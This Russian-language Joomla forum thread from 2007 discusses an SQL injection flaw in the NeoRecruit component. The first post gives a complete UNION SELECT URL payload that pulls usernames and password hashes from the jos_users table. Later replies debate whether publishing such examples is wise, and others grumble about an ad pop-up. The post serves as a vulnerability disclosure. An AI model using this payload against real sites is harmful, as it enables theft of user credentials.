Уязвимости в Joomla Component NeoRecruit

Тема в разделе "Вопросы безопасности", создана пользователем chilly_bang, 24.08.2007.

  1. chilly_bang
    Offline

    chilly_bang специалист

    Регистрация:
    30.04.2006
    Сообщения:
    1 545
    Симпатии:
    38
    Пол:
    Мужской
    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    Пример:

    //index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201, concat(char(117,115,101,114,110,97,109,101,58), username,char(32,112,97,115,115,119,111,114,100,58), password),3,4,5,6,7,8,111,222,333,444,0,0,0,555, 666,777,888,1,2,3,4,5,0%20from%20jos_users/*

    http://xakep.ru/post/39854/default.asp
     
  2.  
  3. Лат
    Offline

    Лат Звоните 8 (905) 778-52-44

    Регистрация:
    31.01.2007
    Сообщения:
    1 751
    Симпатии:
    113
    Пол:
    Мужской
    Ответ: Уязвимости в Joomla Component NeoRecruit

    а я это порно и не юзал даже)
     
  4. OlegM
    Offline

    OlegM Russian Joomla! Team Команда форума

    Регистрация:
    12.04.2007
    Сообщения:
    4 356
    Симпатии:
    370
    Пол:
    Мужской
    Ответ: Уязвимости в Joomla Component NeoRecruit

    А стоит ли давать примеры и ссылки на источник? :\
     
  5. chilly_bang
    Offline

    chilly_bang специалист

    Регистрация:
    30.04.2006
    Сообщения:
    1 545
    Симпатии:
    38
    Пол:
    Мужской
    Ответ: Уязвимости в Joomla Component NeoRecruit

    а меня как-то ладм наругал, что не дал;)
     
    Последнее редактирование модератором: 05.04.2014
  6. OlegM
    Offline

    OlegM Russian Joomla! Team Команда форума

    Регистрация:
    12.04.2007
    Сообщения:
    4 356
    Симпатии:
    370
    Пол:
    Мужской
    Ответ: Уязвимости в Joomla Component NeoRecruit

    пример или ссылку?

    PS: а реклама хакера бесит. т.к. окно в Опере не закрывается
     
  7. AmmiAk
    Offline

    AmmiAk Укротитель браузеров

    Регистрация:
    25.07.2007
    Сообщения:
    633
    Симпатии:
    34
    Пол:
    Мужской
    Ответ: Уязвимости в Joomla Component NeoRecruit

    Google перестал искать торренты - второй пост от головы состава, а может, еще где. :ups:
    Пример - ссылка была, как раз после темы топика она в сообщении и находилась. Не знаю, может быть, для подобных обзоров следовало бы основать на форуме какой-то отдельный раздел? Не думаю, что подобная инфа может кому-то навредить... :X
     
    Последнее редактирование модератором: 05.04.2014
  8. chilly_bang
    Offline

    chilly_bang специалист

    Регистрация:
    30.04.2006
    Сообщения:
    1 545
    Симпатии:
    38
    Пол:
    Мужской
    Ответ: Уязвимости в Joomla Component NeoRecruit

    её.
    с окном неприятно и досадно: в ФФ нету проблемы.
     
    Последнее редактирование модератором: 05.04.2014

Поделиться этой страницей

Загрузка...